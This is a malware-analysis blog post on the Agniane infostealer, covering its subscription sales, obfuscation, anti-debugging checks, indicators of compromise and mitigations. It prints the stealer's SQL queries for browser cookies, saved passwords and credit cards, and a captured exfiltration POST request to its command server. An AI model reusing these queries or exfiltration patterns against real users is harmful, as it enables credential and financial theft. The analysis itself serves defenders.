Analyzing Agniane Stealer

Agniane is an emerging infostealer identified in August 2023. Dive into how Agniane collects data, evades analysis, and expands operations in this blog.

Analyzing Agniane Stealer

Agniane is a new information stealer identified by @MalGamy12 in August 2023. This stealer operates on an as-a-service model where the developers grant access to the application for US$50 per month or US$120 for a three month subscription. In addition to exfiltrating information from web browsers, the information stealer targets cryptocurrency wallets by searching for over 70 cryptocurrency extensions, Discord tokens, data from WinSCP and FileZilla, and Telegram clients.

Figure 1: Pulsedive's Agniane threat page
Figure 2: Telegram post advertising the subscription cost of the stealer, Source: Telegram

This blog will go over findings from our own analysis as well as analysis from other researchers with the aim of providing an overview of the emerging Agniane information stealer and highlighting some of its capabilities.

Control Panel Login

The Agniane control panels allows operators to view exfiltrated data from infected machines and update settings.

Figure 3: Control Panel Login Page, Source: URLScan, Historical Screenshot in Pulsedive Pro

The link embedded in the Russian text, “Я забыл свой пароль,” translating to “I Forgot My Password” in English, points to a Telegram channel for Agniane. The Telegram user allows operators to message with creators to get assistance while using the application. Included in the bio of the first channel is the details of a bot that can be used.

Figure 4: Telegram for Agniane, Source: Telegram
Figure 5: Telegram for Agniane Bot, Source: Telegram

Analysis of an Agniane Sample

A confirmed Agniane sample was analyzed to identify the capabilities the information stealer offers. Details about the sample are provided below:

File Name: Silk.exe
MD5: 26f4545cb49e3a62c2366c77a965d924
SHA1: 5cee6a59a3bf58fb945e4d8b55518af32f56d486
SHA256: 43bc6f5e9e7cb2748c1c2d45df63d22bc00b3d90a4f53f6a48c0ce2c948d5635
File Type: Windows 32-bit executable

The sample is available on Virustotal. It is a .NET executable that is protected using ConfuserEx.

Figure 6: DetectItEasy (DiE) showing the application is protected with Confuser
💡
Note: To check the logic used by DiE to identify packers or protectors, users can click on the S next to the name of the protector. This will launch the signature file that triggered on the sample. In our case, the signature file is Confuser.2.sig (Figure 7).
Figure 7: Signature logic for Confuser within DiE

The strings within PEStudio show the value that triggers within the detect() function.

Figure 8: Strings that indicate this binary is protected by Confuser observed within PEStudio
Figure 9: The string ConfusedByAttribute present within the binary seen within a hex editor

What is Confuser?

Confuser is an open-source protector for .NET applications. It allows users to protect applications by performing:

  • Symbol renaming
  • Control flow obfuscation
  • Anti-debugger/profiles
  • Anti tampering
  • Constant encryption
  • Resource encryption
  • Compressing output

Confuser is used to make analysis of the binary more difficult and it replaces functions names with strings of characters making it harder to understand the code (Figure 10).

Figure 10: Code that has been protected by Confuser

Anti-Analysis Techniques

The sample leverages several anti-analysis techniques to make analysis of the malware more difficult. These techniques include:

  • Checking for the presence of a debugger
  • Verified tick counts
  • Detecting analysis tools
  • Check IP location
Figure 11: Anti-analysis techniques used by Agniane Stealer
💡
The UnProtect Project, a free community database, has helpful explanations on anti-debugging and other malware evasion techniques

One of the anti-analysis techniques used by the sample is to check for the presence of a debugger. When the CheckRemoteDebuggerPresent() function is called with the current process, the program checks if the process has a non-zero debug port. A non-zero value for the debug port indicates that the program is being debugged.

Figure 12: Code to check for the presence of a debugger

Zscaler’s analysis of Agniane binaries uncovered that the binary looks for the presence of the following analysis tools:

  • ProcessHacker
  • Netstat
  • Netmon
  • TCPView
  • WireShark
  • Filemon
  • Regmon
  • Cain

If any of these tools are running on the endpoint, the binary terminates.

Figure 13: Checks that binary sleeps for 10 ms

As part of the anti-analysis checks, the binary gets the current date and time of the host expressed in ticks. Following that, the binary sleeps for 10 ms and then checks the current time again. This is done to see if the sleep command has been skipped via a debugger or other analysis tools.

According to the data collected in a Sandbox report from Triage, the IP location is checked through a GET request to https://ipwho.is/?output=xml.

Information from Web Browsers

The application uses SQLite to collect information from the web browsers including Mozilla Firefox (Figure 12). Before attempting to collect information from web browsers, the Agniane binaries attempt to download DLLs that are used to interact with SQLite databases. These DLLs include:

  • System.Data.SQLite.dll
  • System.Data.SQLite.EF6.dll
  • System.Data.SQLite.Linq.dll
  • SQLite.Interop.dll (x86 version)
  • SQLite.Interop.dll (x64 version)

The screenshot below from a Triage Sandbox report shows GET requests for the DLLs that are downloaded.

Figure 14: GET requests for SQLite DLLs, Source: Triage
Figure 15: Screenshot showing SQL queries used to get data from Mozilla Firefox

From Mozilla Firefox the binary collects records from:

  • Cookies (moz_cookies)
  • History (moz_places)
  • Bookmarks (moz_bookmarks)
  • Downloads (moz_annos)
  • Form History (moz_formhistory)
Figure 16: Data exfiltrated from Mozilla Firefox
💡
A handy user guide for Firefox file details is Foxton Forensics.

The SQL queries used to gather information include:

SELECT creation_utc,top_frame_site_key,host_key,name,value,encrypted_value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,samesite,source_scheme,source_port,is_same_party FROM cookies

This is used to collect information from cookies

SELECT origin_url,action_url,username_element,username_value,password_element,password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for,date_password_modified FROM logins

Used to collect information from saved logins

SELECT id,url,title,visit_count,typed_count,last_visit_time,hidden FROM urls

Used to collection information from history

SELECT id,guid,current_path,target_path,start_time,received_bytes,total_bytes,state,danger_type,interrupt_reason,hash,end_time,opened,last_access_time,transient,referrer,site_url,tab_url,tab_referrer_url,http_method,by_ext_id,by_ext_name,etag,last_modified,mime_type,original_mime_type,embedder_download_data FROM downloads

This query is used to gather information about the browser's downloads

SELECT name,value,value_lower,date_created,date_last_used,count FROM autofill

Gather data from autofill data

SELECT guid,name_on_card,expiration_month,expiration_year,card_number_encrypted,date_modified,origin,use_count,use_date,billing_address_id,nickname FROM credit_cards

Query used to collect saved credit card data

Searching for CryptoWallets

Similar to other information stealers, Agniane searches for the presence of any cryptocurrency wallets on the compromised host.

This is done by looking for extensions for popular cryptocurrency wallet applications like Binance, Coinbase and Etheruem. The binary checks to see if any cryptocurrency extensions are installed on web browsers (Figure 17) and reports that information back to the control server (Figure 18). The binary will attempt to grab data from these extensions as part of its data exfiltration process.

Figure 17: List of hardcoded extensions that the binary looks for. Source: Twitter (@MalGamy12)

Data Exfiltration

Data is exfiltrated by sending it to a remote server. This is done using a POST request in which the URI contains information such as the build, username, country and hostname of the compromised host.

Remote address:
188.114.96.0:443
Request
POST /gate?id=1&build=yungway&passwords=0&cookies=0&username=Admin&country=NL&ip=154.61.71.13&BSSID=078BFBFF000306D2&wallets=0&token=AGNIANE-1978395155885&ext=0&filters=0&pcname=HISXQJCD HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------8db99a21a4017d4
Host: 6rbygv.ru
Content-Length: 69549
Expect: 100-continue
Response
HTTP/1.1 200 OK
Date: Thu, 10 Aug 2023 13:02:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=cktl4dif9li5usun9s7frcgqoq; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AOmw1pP5Bw2M6CM1%2BL0%2FH9nhYXOMBjPyzesF%2FqEb2ErFRdZEBGbGoEPCZktnv%2FwcPwZQPg89ItfCJMKWrO2UYUMiUNgvitRqtLyT5MDp%2BgyhlKGT7oxrIFyfroU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7f486f856dcb1b0b-AMS
alt-svc: h3=":443"; ma=86400

Figure 18: Network data captured in the POST request. Source: Triage

In the sample analysed for this blog the C2 server appears to be hxxps[://]central-cee-doja[.]ru/ (IOC page). This value is extracted from the name of a telegram channel that the binary connects to. The channel is hxxp[://]t[.]me/cinoshibot.

Figure 19: Cinoshibot’s Telegram page displaying the name of the C2 server, Source: Telegram

Conclusion

Agniane is an information stealer that operates using an as-a-service model. It attempts to collect information from browsers, cryptocurrency extensions and Telegram data. This information is collected and sent to a C2 server where operators can view all collected information.

Based on information provided by similar investigations, it appears that the developers of Agniane are using different techniques to hinder analysis. They offer the ability to use protectors such as Confuser to reduce human readability and have been observed using telegram to get C2 information instead of hardcoding it into the binary itself.

Recommendations

Figure 20: Recommendations to mitigate risks posed by information stealers

Here are some methods to mitigate the risks posed by information stealers like Agniane:

  • Using MFA
    • MFA requires a second factor of authentication that can help prevent unauthorised access to account even if the adversary has access to the user’s credentials
  • User Education
    • Users can help mitigate the risk of information stealer infections by avoiding suspicious websites and using authorised software in corporate environments.
  • Monitor for connections to remote services or message applications that are uncommon within the environment
    • In our sample, the binary connected to Telegram to get the C2 URL. Security solutions can be used to monitor for connection or data being sent to messaging applications.

Indicators of Compromise

The table below contains a list of Agniane network IoCs that have been identified and added to the Pulsedive platform. This data can be queried in Pulsedive using the Explore query threat="Agniane" and is available for export in multiple formats (CSV, STIX 2.1, JSON).

172[.]67[.]176[.]177

hxxps[://]6rbygv[.]ru/login

hxxp[://]t[.]me/cinoshibot

hxxps[://]central-cee-doja[.]ru/

hxxps[://]t[.]me/agnianebot

hxxps[://]t[.]me/agniane

MITRE ATT&CK TTPs

Technique

Tactic

Collection

Clipboard Data (T1115)

Screen Capture (T1113)

Command and Control

Application Layer Protocol (T1071)

Ingress Tool Transfer (T1105)

Defense Evasion

Impair Defenses: Disable or Modify Tools (T1562.001)

Deobfuscate/Decode Files or Information (T1140)

Obfuscated Files or Information: Software Packing (T1027.002)

Virtualization/Sandbox Evasion (T1497)

Discovery

Application Windows Discovery (T1010)

System Information Discovery (T1082)

Virtualization/Sandbox Evasion (T1497)

Execution

Native APIs (T1106)

Shared Modules (T1129)

Windows Management Instrumentation (T1047)

References

https://twitter.com/MalGamy12/status/1688984207752663040?t=xECvfQF8pujQERAmhfI41w&s=19

https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-webs-crypto-threat

https://urlscan.io/result/26f40945-582b-4ac3-b6e8-7b3f887bd2a6/

https://tria.ge/230810-p92wxach32/behavioral2#report

https://thecyberexpress.com/agniane-stealer-dark-web-info-stealer/

https://www.virustotal.com/gui/file/43bc6f5e9e7cb2748c1c2d45df63d22bc00b3d90a4f53f6a48c0ce2c948d5635/details